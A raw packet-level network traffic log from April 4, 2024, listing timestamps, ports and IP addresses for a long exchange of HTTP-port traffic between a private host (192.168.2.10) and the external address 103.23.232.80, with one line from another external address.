Apr 4, 2024 17:49:06.849211931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849225998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849251032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849265099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849267006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849306107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849323988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849342108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849342108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849361897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849364996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849397898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849397898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849420071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849442959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849456072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849479914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849498034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849515915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849518061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849554062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849554062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849571943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849590063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849607944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849626064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849627018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849664927 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849724054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849740028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849757910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849759102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849777937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849801064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849802017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849814892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849848986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849868059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849884987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849903107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849925041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849940062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849958897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849977016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849993944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850008011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850029945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850070953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850083113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850116968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850135088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850163937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850172997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850204945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850241899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850260019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850285053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850301981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850320101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850337029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850356102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850404978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850446939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850461960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850465059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850497961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850501060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850522995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850538015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850557089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850574970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850641012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850660086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850677967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850677967 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850698948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850711107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850722075 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.850737095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850738049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850806952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850824118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850841999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850842953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850860119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850878000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850897074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850897074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850923061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850939035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850956917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850974083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.850976944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.850992918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851005077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851032972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851048946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851068020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851072073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851085901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851108074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851159096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851218939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851233959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851247072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851268053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851274967 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851293087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851310968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851330042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851337910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851447105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851449013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851466894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851490021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851502895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851509094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851527929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851546049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851560116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851563931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851583958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851589918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851624966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851629019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851665974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851697922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851744890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851761103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851805925 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851834059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851852894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851861954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851897001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851922035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851938009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851953983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.851958036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851980925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.851998091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852015018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852037907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852039099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852078915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852093935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852111101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852113962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852147102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852153063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852165937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852184057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852215052 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852226019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852262974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852281094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852297068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852299929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852314949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852322102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852390051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852406979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852415085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852436066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852463007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852478981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852482080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852502108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852504015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852520943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852535009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852539062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852557898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852576017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852580070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852615118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852633953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852653980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852673054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852689981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852706909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852731943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852761984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852777958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852807999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852811098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852838039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852854013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852870941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852870941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852895021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852910042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852911949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852936029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852969885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.852974892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.852992058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853008986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853023052 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853028059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853039980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853048086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853110075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853117943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853135109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853153944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853187084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853190899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853209972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853229046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853234053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853251934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853264093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853271008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853322983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853339911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853344917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853358984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853370905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853396893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853427887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853452921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853471994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853490114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853507996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853523016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853527069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853544950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853548050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853579044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853595972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853612900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853631973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853651047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853653908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853708982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853739023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853775978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853806973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853809118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853827953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853847027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853863955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853887081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853918076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853951931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.853955984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853972912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.853998899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854007959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854024887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854041100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854062080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854079962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854098082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854115009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854134083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854135990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854202032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854218006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854232073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854237080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854275942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854274988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854295015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854320049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854327917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854360104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854376078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854389906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854394913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854446888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854464054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854466915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854506016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854538918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854542017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854567051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854599953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854604006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854619980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854638100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854655981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854655981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854667902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854675055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854811907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854820013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854852915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854872942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854891062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854912043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854957104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.854962111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.854973078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855010033 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855040073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855060101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855077982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855097055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855112076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855114937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855129004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855151892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855170012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855186939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855195045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855214119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855233908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855252981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855268002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855285883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855302095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855304003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855319977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855334997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855355024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855357885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855376959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855395079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855412960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855434895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855452061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855468035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855470896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855508089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855526924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855545998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855576038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855596066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855617046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855631113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.855652094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.855699062 CEST	80	49730	103.23.232.80	192.168.2.10
